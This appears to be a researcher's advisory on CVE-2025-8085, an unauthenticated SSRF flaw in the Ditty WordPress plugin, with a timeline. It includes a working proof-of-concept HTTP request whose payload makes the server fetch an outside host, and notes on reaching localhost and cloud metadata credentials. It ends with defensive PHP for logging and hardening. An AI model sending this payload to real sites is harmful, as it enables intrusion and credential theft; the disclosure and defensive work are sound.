Ditty is a popular WordPress plugin for creating dynamic content displays (tickers, charts, and news feeds) through a user-friendly block editor interface. With over 50,000 active installations, it is widely used to embed real-time data and media into pages and posts. However, a critical vulnerability, CVE-2025-8085, has been identified in its REST API: an unauthenticated Server-Side Request Forgery (SSRF) flaw in the endpoint `wp-json/dittyeditor/v1/displayItems`. This allows any unauthenticated visitor to coerce the server into fetching arbitrary external or internal URLs, potentially exposing internal network resources or enabling further exploits like remote code execution or data exfiltration.
| Field | Value |
| --- | --- |
| CVE | CVE-2025-8085 |
| Plugin Version | Ditty < 3.1.58 |
| Severity | High |
| All Time | 2 647 703 |
| Active installations | 50 000+ |
| Publicly Published | August 25, 2025 |
| Last Updated | August 25, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8085 and https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/ |
Timeline
| Date | Event |
| --- | --- |
| July 2, 2025 | Plugin testing and vulnerability detection in Ditty – Responsive News Tickers, Sliders, and Lists has been completed |
| July 2, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 25, 2025 | Registered CVE-2025-8085 |
Discovery of the Vulnerability
During a security assessment of Ditty's API, researchers discovered that the `displayItems` route accepted user-supplied HTML attributes, including image sources, without validating or restricting the target domains. Specifically, a crafted JSON payload containing `"html": "{image default_src=\"https://webhoo12312312k.site/...\"}"` instructs the server to fetch the specified URL. Because the endpoint is publicly accessible and requires neither authentication nor origin checks, attackers can direct the server to any internal or external endpoint, leading to SSRF.
Understanding SSRF attacks
Server-Side Request Forgery (SSRF) occurs when a web application fetches a URL chosen by user input. In WordPress, SSRF vulnerabilities have been observed in plugins that proxy external resources, such as image optimization services or remote content preview features, without a proper allow list or validation. CVE-2025-8085 in Ditty follows this pattern, exposing internal interfaces (e.g., http://localhost:22/) or cloud metadata endpoints (e.g., AWS IAM metadata) to attackers, enabling information disclosure or pivoting to remote code execution.
Exploiting the SSRF Vulnerability
To exploit CVE-2025-8085, an unauthenticated attacker (no user cookies required) sends the following request:
PoC:

```http
POST /wordpress/index.php/wp-json/dittyeditor/v1/displayItems HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/plugins.php
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 436
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{
  "apiData": {
    "layouts": [
      {
        "id": "ssrf_layout",
        "html": "{image default_src=\"https://webhoo12312312k.site/3aa51640-4d0f-4fa0-a724-0eeb3d5bbd49\"}",
        "css": ""
      }
    ],
    "items": [
      {
        "item_id": "1",
        "item_type": "default",
        "item_value": { "content": "SSRF demo" },
        "layout_value": { "default": "ssrf_layout" }
      }
    ]
  }
}
```
SSRF in a WordPress plugin as widely installed as Ditty poses severe risks. In shared-hosting environments or cloud deployments, attackers can exploit CVE-2025-8085 to:
- Access internal network services (databases, admin panels) by scanning private IP ranges, leading to lateral movement.
- Retrieve cloud metadata (e.g., AWS IAM credentials), escalating to full cloud account compromise.
- Bypass firewall policies, performing port scans or injecting malicious payloads into trusted internal applications.
Large enterprises using Ditty for dynamic dashboards or data integrations face potential data breaches, infrastructure downtime, and reputational damage.
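The risks listed above are only visible to a defender who can see what the application itself fetches. The following is an added monitoring example written for this page, not Ditty's own code: it hooks the WordPress `http_api_debug` action (which fires after every request made through the WP HTTP API) and writes a structured log line per outbound request, escalating to a warning when the destination is loopback, a private or link-local range, or a cloud metadata host, together with the inbound request URI so hits on `wp-json/dittyeditor/v1/displayItems` can be correlated. All names prefixed `ssrfmon_` are hypothetical, and the sample destinations at the bottom are constructed, not captured traffic.

```php
<?php
// Added example (not part of the Ditty plugin): log outbound HTTP requests made
// by WordPress and flag destinations an SSRF would typically be aimed at.
// Names prefixed "ssrfmon_" are hypothetical.

/** Classify an outbound destination host as 'metadata', 'internal' or 'external'. */
function ssrfmon_classify_host( $host ) {
    $host = strtolower( trim( (string) $host, '[]' ) );
    if ( $host === '' ) {
        return 'internal'; // unparseable host: treat as suspicious
    }
    // Well-known cloud metadata endpoints are called out explicitly.
    if ( $host === '169.254.169.254' || $host === 'metadata.google.internal' ) {
        return 'metadata';
    }
    if ( $host === 'localhost' ) {
        return 'internal';
    }
    // Literal IPs are checked directly; hostnames are resolved first so a DNS
    // record pointing into private space is still classified as internal.
    $ip = filter_var( $host, FILTER_VALIDATE_IP ) ? $host : gethostbyname( $host );
    if ( filter_var( $ip, FILTER_VALIDATE_IP )
        && ! filter_var( $ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE ) ) {
        return 'internal'; // RFC 1918, loopback, link-local, reserved
    }
    return 'external';
}

/** Build one structured log line for an outbound request and the inbound URI that triggered it. */
function ssrfmon_log_line( $url, $inbound_uri ) {
    $host  = parse_url( $url, PHP_URL_HOST );
    $class = ssrfmon_classify_host( $host );
    $level = ( $class === 'external' ) ? 'info' : 'warning';
    return sprintf(
        'ssrfmon level=%s class=%s host=%s url=%s inbound=%s',
        $level, $class, (string) $host, $url, $inbound_uri
    );
}

// Inside WordPress: record every WP HTTP API request (wp_remote_get, wp_safe_remote_get, ...).
if ( function_exists( 'add_action' ) ) {
    add_action( 'http_api_debug', function ( $response, $context, $class, $parsed_args, $url ) {
        $inbound = isset( $_SERVER['REQUEST_URI'] ) ? $_SERVER['REQUEST_URI'] : '-';
        error_log( ssrfmon_log_line( $url, $inbound ) );
    }, 10, 5 );
}

// Constructed sample destinations (not real traffic) to show the classification.
if ( php_sapi_name() === 'cli' ) {
    $samples = array(
        'https://cdn.example.com/banner.png',
        'http://localhost:22/',
        'http://169.254.169.254/latest/meta-data/',
        'http://10.0.0.5:8080/admin',
    );
    foreach ( $samples as $u ) {
        echo ssrfmon_log_line( $u, '/wp-json/dittyeditor/v1/displayItems' ), "\n";
    }
}
```

A `warning` line whose `inbound` value is the `displayItems` route and whose `class` is `internal` or `metadata` is exactly the signal a SOC rule should alert on; on a patched site that combination should never occur.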
Recommendations for Improved Security
To mitigate CVE-2025-8085 and prevent SSRF attacks:
- Implement URL Whitelisting: Restrict external fetches to approved domains or subnets, rejecting any others.
- Validate User Input: Sanitize and parse HTML attributes, disallowing `http://`, `https://`, or redirect patterns in untrusted contexts.
- Require Authentication: Protect sensitive API routes with capability checks, ensuring only authenticated users can render dynamic layouts.
- Use a WAF: Deploy a Web Application Firewall to block SSRF patterns and monitor outbound requests from the application.
- Audit Plugin Code: Review all endpoints that perform server-side fetches, ensuring each implements robust validation and error handling.
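The following is an added example of how the first three recommendations combine in a WordPress REST route; it is written for this page and is not Ditty's own code or its fix. It registers a `displayItems`-style route with a `permission_callback` that refuses unauthenticated callers, extracts every `default_src` from the submitted layout HTML, and allows a server-side fetch only when the URL uses http(s), its host is on an exact-match allow list, and the host resolves to a public address. Remaining fetches go through `wp_safe_remote_get()` with redirects disabled, so a redirect cannot steer the request into internal space. All names prefixed `ssrfdemo_` and the allow-listed hosts are hypothetical.

```php
<?php
// Added hardening example (not the Ditty plugin's code). Names prefixed
// "ssrfdemo_" and the hosts in the allow list are hypothetical.

/** Hosts from which server-side image fetches are permitted (constructed list). */
function ssrfdemo_allowed_hosts() {
    return array( 'cdn.example.com', 'images.example.com' );
}

/**
 * True only for URLs the server may fetch: http(s) scheme, no embedded
 * credentials, an allow-listed host, and a public IP once the host is resolved.
 */
function ssrfdemo_is_safe_fetch_url( $url ) {
    $parts = wp_parse_url( $url );
    if ( ! is_array( $parts ) || empty( $parts['scheme'] ) || empty( $parts['host'] ) ) {
        return false;
    }
    if ( ! in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true ) ) {
        return false; // rejects file://, gopher://, php:// and friends
    }
    if ( isset( $parts['user'] ) || isset( $parts['pass'] ) ) {
        return false; // rejects user@host confusion
    }
    $host = strtolower( $parts['host'] );
    if ( ! in_array( $host, ssrfdemo_allowed_hosts(), true ) ) {
        return false; // exact match only, no suffix or substring matching
    }
    // Resolve and check the address so an allow-listed name that points at
    // 127.0.0.1, 169.254.169.254 (cloud metadata) or RFC 1918 space is refused.
    $ip = gethostbyname( $host );
    if ( $ip === $host ) {
        return false; // DNS resolution failed
    }
    return (bool) filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    );
}

/** Extract every default_src="..." target from a decoded layout HTML string. */
function ssrfdemo_extract_default_src( $html ) {
    preg_match_all( '/default_src="([^"]+)"/i', (string) $html, $m );
    return $m[1];
}

/** REST callback: validate each image source before any server-side fetch. */
function ssrfdemo_display_items( WP_REST_Request $request ) {
    $api_data = $request->get_param( 'apiData' );
    $layouts  = ( isset( $api_data['layouts'] ) && is_array( $api_data['layouts'] ) )
        ? $api_data['layouts'] : array();

    foreach ( $layouts as $layout ) {
        $html = isset( $layout['html'] ) ? $layout['html'] : '';
        foreach ( ssrfdemo_extract_default_src( $html ) as $src ) {
            if ( ! ssrfdemo_is_safe_fetch_url( $src ) ) {
                return new WP_Error(
                    'rest_forbidden_url',
                    'Image source not permitted.',
                    array( 'status' => 400 )
                );
            }
            // wp_safe_remote_get() applies WordPress's own unsafe-URL rejection;
            // 'redirection' => 0 stops a redirect from reaching an internal target.
            $response = wp_safe_remote_get( $src, array( 'timeout' => 5, 'redirection' => 0 ) );
            if ( is_wp_error( $response ) ) {
                return $response;
            }
        }
    }
    return rest_ensure_response( array( 'status' => 'ok' ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'ssrfdemo/v1', '/displayItems', array(
        'methods'             => 'POST',
        'callback'            => 'ssrfdemo_display_items',
        // Unauthenticated visitors are refused before the callback runs.
        'permission_callback' => function () {
            return current_user_can( 'edit_posts' );
        },
    ) );
} );
```

Note the order of the checks: the capability check runs first, so the route is no longer reachable by anonymous visitors at all, and the URL validation is a second, independent layer for authenticated users who can still submit layouts. Resolving the host before deciding is what closes the gap left by a name-only allow list.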
By taking proactive measures to address SSRF vulnerabilities like CVE-2025-8085, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
Dmitrii I.